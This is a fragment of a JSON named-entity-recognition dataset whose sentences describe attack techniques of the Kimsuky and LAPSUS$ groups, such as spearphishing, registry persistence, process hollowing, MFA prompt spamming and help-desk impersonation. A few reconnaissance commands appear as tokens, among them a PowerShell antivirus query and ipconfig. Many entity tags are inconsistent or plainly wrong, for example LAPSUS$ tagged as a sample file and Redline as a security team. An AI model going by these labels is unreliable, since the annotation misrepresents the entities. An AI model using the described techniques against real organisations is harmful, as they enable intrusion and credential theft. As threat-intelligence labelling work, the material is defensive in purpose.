"B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "a", - "tool", - "called", - "GREASE", - "to", - "add", - "a", - "Windows", - "admin", - "account", - "in", - "order", - "to", - "allow", - "them", - "continued", - "access", - "via", - "RDP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "staged", - "collected", - "data", - "files", - "under", - "<code>C:\\Program", - "Files\\Common", - "Files\\System\\Ole", - "DB\\</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "e-mail", - "to", - "send", - "exfiltrated", - "data", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "attempted", - "to", - "lure", - "victims", - "into", - "opening", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "lured", - "victims", - "into", - "clicking", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "developed", - "its", - "own", - "unique", - "malware", - "such", - "as", - "MailFetch.py", - "for", - "use", - "in", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "disguised", - "services", - "to", - "appear", - "as", - "benign", - "software", - "or", - "related", - "to", - "operating", - "system", - "functions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "renamed", - "malware", - "to", - "legitimate", - "names", - "such", - "as", - "<code>ESTCommon.dll</code>", - "or", - "<code>patch.dll</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "modified", - "Registry", - "settings", - "for", - "default", - "file", - "associations", - "to", - "enable", - "all", - "macros", - "and", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "mshta.exe", - "to", - "run", - "malicious", - "scripts", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "a", - "proprietary", - "tool", - "to", - "intercept", - "one", - "time", - "passwords", - "required", - "for", - "two-factor", - "authentication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "the", - "Nirsoft", - "SniffPass", - "network", - "sniffer", - "to", - "obtain", - "passwords", - "sent", - "over", - "non-secure", - "protocols." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "obfuscated", - "binary", - "strings", - "including", - "the", - "use", - "of", - "XOR", - "encryption", - "and", - "Base64", - "encoding.", - "Kimsuky", - "has", - "also", - "modified", - "the", - "first", - "byte", - "of", - "DLL", - "implants", - "targeting", - "victims", - "to", - "prevent", - "recognition", - "of", - "the", - "executable", - "file", - "format." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "pass", - "the", - "hash", - "for", - "authentication", - "to", - "remote", - "access", - "software", - "used", - "in", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "executed", - "a", - "variety", - "of", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Kimsuky", - "can", - "gather", - "a", - "list", - "of", - "all", - "processes", - "running", - "on", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "a", - "file", - "injector", - "DLL", - "to", - "spawn", - "a", - "benign", - "process", - "on", - "the", - "victim's", - "system", - "and", - "inject", - "the", - "malicious", - "payload", - "into", - "it", - "via", - "process", - "hollowing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "Win7Elevate", - "to", - "inject", - "malicious", - "code", - "into", - "explorer.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "a", - "macOS", - "Python", - "implant", - "to", - "gather", - "data", - "as", - "well", - "as", - "MailFetcher.py", - "code", - "to", - "automatically", - "collect", - "email", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "obtained", - "specific", - "Registry", - "keys", - "and", - "values", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "placed", - "scripts", - "in", - "the", - "startup", - "folder", - "for", - "persistence", - "and", - "modified", - "the", - "`HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce`", - "Registry", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "executed", - "malware", - "with", - "<code>regsvr32s</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "a", - "modified", - "TeamViewer", - "client", - "as", - "a", - "command", - "and", - "control", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "RDP", - "for", - "direct", - "remote", - "point-and-click", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "tools", - "such", - "as", - "the", - "MailFetch", - "mail", - "crawler", - "to", - "collect", - "victim", - "emails", - "(excluding", - "spam)", - "from", - "online", - "services", - "via", - "IMAP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "`rundll32.exe`", - "to", - "execute", - "malicious", - "scripts", - "and", - "malware", - "on", - "a", - "victim's", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "downloaded", - "additional", - "malware", - "with", - "scheduled", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "searched", - "for", - "vulnerabilities,", - "tools,", - "and", - "geopolitical", - "trends", - "on", - "Google", - "to", - "target", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "searched", - "for", - "information", - "on", - "the", - "target", - "company's", - "website." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "checked", - "for", - "the", - "presence", - "of", - "antivirus", - "software", - "with", - "<code>powershell", - "Get-CimInstance", - "-Namespace", - "root/securityCenter2", - "–", - "classname", - "antivirusproduct</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "purchased", - "hosting", - "servers", - "with", - "virtual", - "currency", - "and", - "prepaid", - "cards." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "Twitter", - "to", - "monitor", - "potential", - "victims", - "and", - "to", - "prepare", - "targeted", - "phishing", - "e-mails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "created", - "social", - "media", - "accounts", - "to", - "monitor", - "news", - "and", - "security", - "trends", - "as", - "well", - "as", - "potential", - "targets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "packed", - "malware", - "with", - "UPX." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "emails", - "containing", - "Word,", - "Excel", - "and/or", - "HWP", - "(Hangul", - "Word", - "Processor)", - "documents", - "in", - "their", - "spearphishing", - "campaigns." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "a", - "link", - "to", - "a", - "document", - "that", - "contained", - "malicious", - "macros", - "or", - "took", - "the", - "victim", - "to", - "an", - "actor-controlled", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "links", - "in", - "e-mail", - "to", - "steal", - "account", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "enumerated", - "drives,", - "OS", - "type,", - "OS", - "version,", - "and", - "other", - "information", - "using", - "a", - "script", - "or", - "the", - "\"systeminfo\"", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "`ipconfig/all`", - "to", - "gather", - "network", - "configuration", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "an", - "instrumentor", - "script", - "to", - "gather", - "the", - "names", - "of", - "all", - "services", - "running", - "on", - "a", - "victim's", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "manipulated", - "timestamps", - "for", - "creation", - "or", - "compilation", - "dates", - "to", - "defeat", - "anti-forensics." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Nirsoft", - "WebBrowserPassVIew,", - "Mimikatz,", - "and", - "PsExec." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "Blogspot", - "to", - "host", - "malicious", - "content", - "such", - "as", - "beacons,", - "file", - "exfiltrators,", - "and", - "implants." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "Visual", - "Basic", - "to", - "download", - "malicious", - "payloads.", - "Kimsuky", - "has", - "also", - "used", - "malicious", - "VBA", - "macros", - "within", - "maldocs", - "disguised", - "as", - "forms", - "that", - "trigger", - "when", - "a", - "victim", - "types", - "any", - "content", - "into", - "the", - "lure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "B-Purp", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "HTTP", - "GET", - "and", - "POST", - "requests", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "hosted", - "content", - "used", - "for", - "targeting", - "efforts", - "via", - "web", - "services", - "such", - "as", - "Blogspot." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "modified", - "versions", - "of", - "open", - "source", - "PHP", - "web", - "shells", - "to", - "maintain", - "access,", - "often", - "adding", - "\"Dinosaur\"", - "references", - "within", - "the", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "executed", - "Windows", - "commands", - "by", - "using", - "`cmd`", - "and", - "running", - "batch", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "created", - "new", - "services", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "removed", - "a", - "targeted", - "organization's", - "global", - "admin", - "accounts", - "to", - "lock", - "the", - "organization", - "out", - "of", - "all", - "access." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "added", - "the", - "global", - "admin", - "role", - "to", - "accounts", - "they", - "have", - "created", - "in", - "the", - "targeted", - "organization's", - "cloud", - "instances." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "gathered", - "detailed", - "knowledge", - "of", - "an", - "organization's", - "supply", - "chain", - "relationships." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "targeted", - "various", - "collaboration", - "tools", - "like", - "Slack,", - "Teams,", - "JIRA,", - "Confluence,", - "and", - "others", - "to", - "hunt", - "for", - "exposed", - "credentials", - "to", - "support", - "privilege", - "escalation", - "and", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "created", - "global", - "admin", - "accounts", - "in", - "the", - "targeted", - "organization's", - "cloud", - "instances", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "used", - "compromised", - "credentials", - "to", - "access", - "cloud", - "assets", - "within", - "a", - "target", - "organization." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "searched", - "public", - "code", - "repositories", - "for", - "exposed", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "searched", - "a", - "victim's", - "network", - "for", - "code", - "repositories", - "like", - "GitLab", - "and", - "GitHub", - "to", - "discover", - "further", - "high-privilege", - "account", - "credentials." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "searched", - "a", - "victim's", - "network", - "for", - "collaboration", - "platforms", - "like", - "Confluence", - "and", - "JIRA", - "to", - "discover", - "further", - "high-privilege", - "account", - "credentials." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "created", - "new", - "virtual", - "machines", - "within", - "the", - "target's", - "cloud", - "environment", - "after", - "leveraging", - "credential", - "access", - "to", - "cloud", - "assets." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "gathered", - "user", - "identities", - "and", - "credentials", - "to", - "gain", - "initial", - "access", - "to", - "a", - "victim's", - "organization;", - "the", - "group", - "has", - "also", - "called", - "an", - "organization's", - "help", - "desk", - "to", - "reset", - "a", - "target's", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "obtained", - "passwords", - "and", - "session", - "tokens", - "with", - "the", - "use", - "of", - "the", - "Redline", - "password", - "stealer." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "used", - "DCSync", - "attacks", - "to", - "gather", - "credentials", - "for", - "privilege", - "escalation", - "routines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "reconfigured", - "a", - "victim's", - "DNS", - "records", - "to", - "actor-controlled", - "domains", - "and", - "websites." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "deleted", - "the", - "target's", - "systems", - "and", - "resources", - "both", - "on-premises", - "and", - "in", - "the", - "cloud." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "searched", - "a", - "victim's", - "network", - "for", - "organization", - "collaboration", - "channels", - "like", - "MS", - "Teams", - "or", - "Slack", - "to", - "discover", - "further", - "high-privilege", - "account", - "credentials." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "uploaded", - "sensitive", - "files,", - "information,", - "and", - "credentials", - "from", - "a", - "targeted", - "organization", - "for", - "extortion", - "or", - "public", - "release." - ], - "ner_tags": [ - "B-SamFile", - "B-Way", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "deleted", - "the", - "target's", - "systems", - "and", - "resources", - "in", - "the", - "cloud", - "to", - "trigger", - "the", - "organization's", - "incident", - "and", - "crisis", - "response", - "process." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "used", - "the", - "AD", - "Explorer", - "tool", - "to", - "enumerate", - "users", - "on", - "a", - "victim's", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "used", - "the", - "AD", - "Explorer", - "tool", - "to", - "enumerate", - "groups", - "on", - "a", - "victim's", - "network." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "payed", - "employees,", - "suppliers,", - "and", - "business", - "partners", - "of", - "target", - "organizations", - "for", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "B-Org", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "gathered", - "employee", - "email", - "addresses,", - "including", - "personal", - "accounts,", - "for", - "social", - "engineering", - "and", - "initial", - "access", - "efforts." - ], - "ner_tags": [ - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "set", - "an", - "Office", - "365", - "tenant", - "level", - "mail", - "transport", - "rule", - "to", - "send", - "all", - "mail", - "in", - "and", - "out", - "of", - "the", - "targeted", - "organization", - "to", - "the", - "newly", - "created", - "account." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "exploited", - "unpatched", - "vulnerabilities", - "on", - "internally", - "accessible", - "servers", - "including", - "JIRA,", - "GitLab,", - "and", - "Confluence", - "for", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "gained", - "access", - "to", - "internet-facing", - "systems", - "and", - "applications,", - "including", - "virtual", - "private", - "network", - "(VPN),", - "remote", - "desktop", - "protocol", - "(RDP),", - "and", - "virtual", - "desktop", - "infrastructure", - "(VDI)", - "including", - "Citrix." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "gathered", - "detailed", - "information", - "of", - "target", - "employees", - "to", - "enhance", - "their", - "social", - "engineering", - "lures." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "gathered", - "detailed", - "knowledge", - "of", - "team", - "structures", - "within", - "a", - "target", - "organization." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "called", - "victims'", - "help", - "desk", - "and", - "impersonated", - "legitimate", - "users", - "with", - "previously", - "gathered", - "information", - "in", - "order", - "to", - "gain", - "access", - "to", - "privileged", - "accounts." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "acquired", - "and", - "used", - "the", - "Redline", - "password", - "stealer", - "in", - "their", - "operations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "replayed", - "stolen", - "session", - "token", - "and", - "passwords", - "to", - "trigger", - "simple-approval", - "MFA", - "prompts", - "in", - "hope", - "of", - "the", - "legitimate", - "user", - "will", - "grant", - "necessary", - "approval." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "spammed", - "target", - "users", - "with", - "MFA", - "prompts", - "in", - "the", - "hope", - "that", - "the", - "legitimate", - "user", - "will", - "grant", - "necessary", - "approval." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "used", - "Windows", - "built-in", - "tool", - "`ntdsutil`", - "to", - "extract", - "the", - "Active", - "Directory", - "(AD)", - "database." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "accessed", - "local", - "password", - "managers", - "and", - "databases", - "to", - "obtain", - "further", - "credentials", - "from", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - 